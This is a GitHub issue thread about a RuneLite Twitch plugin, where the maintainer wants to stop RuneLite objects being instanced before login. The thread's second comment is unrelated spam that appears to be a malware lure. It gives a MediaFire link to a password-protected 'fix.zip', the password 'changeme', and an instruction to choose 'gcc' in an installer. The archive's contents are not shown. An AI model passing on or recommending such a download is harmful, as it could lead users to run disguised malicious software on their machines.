### ISSUE TITLE
Ensure RL objects are not instanced before logged in

### ISSUE THREAD

**Issue by pepijnverburg** [pepijnverburg/osrs-runelite-twitch-live-loadout-plugin#166]
Reference: https://discord.com/channels/301497432909414422/419891709883973642/1277420034808877217

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pepijnverburg** [comment]
Upon review this should not happen.
